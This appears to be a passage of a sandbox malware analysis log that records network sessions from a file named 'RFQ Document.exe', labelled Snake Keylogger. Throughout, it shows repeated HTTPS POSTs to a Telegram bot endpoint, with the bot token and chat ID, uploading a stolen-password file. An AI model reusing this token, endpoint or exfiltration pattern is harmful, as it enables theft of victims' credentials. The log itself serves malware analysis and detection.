                                            2021-09-28 05:59:50 UTC490OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 31 39 33 39 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f7193963Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:50 UTC490INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:50 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:50 UTC491INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            309192.168.2.450146149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:50 UTC491OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f7310ec4
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:50 UTC491OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 33 31 30 65 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f7310ec4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:50 UTC492INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:50 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:50 UTC492INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            31192.168.2.449805149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:26 UTC49OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c5922b0d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:26 UTC49OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 39 32 32 62 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c5922b0dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:27 UTC50INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:27 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:27 UTC50INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12611,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808707,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            310192.168.2.450147149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:50 UTC492OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f7500d3d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:50 UTC492OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 35 30 30 64 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f7500d3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:50 UTC493INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:50 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:50 UTC493INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            311192.168.2.450148149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:50 UTC493OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f765838f
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:50 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 36 35 38 33 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f765838fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:50 UTC494INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:50 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:50 UTC494INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            312192.168.2.450149149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:50 UTC494OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f77d5a04
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:50 UTC495OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 37 64 35 61 30 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f77d5a04Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:50 UTC495INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:50 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:50 UTC495INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            313192.168.2.450150149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:50 UTC496OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f79531e4
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:50 UTC496OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 39 35 33 31 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f79531e4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:50 UTC496INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:50 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:50 UTC497INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            314192.168.2.450151149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:51 UTC497OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255f7aaa6fe
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:51 UTC497OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 37 61 61 61 36 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255f7aaa6feContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:59 UTC497INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:59 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 3
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:59 UTC498INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            315192.168.2.450152149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:59 UTC498OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fc8e57da
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:59 UTC498OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 63 38 65 35 37 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fc8e57daContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:02 UTC499INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:02 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
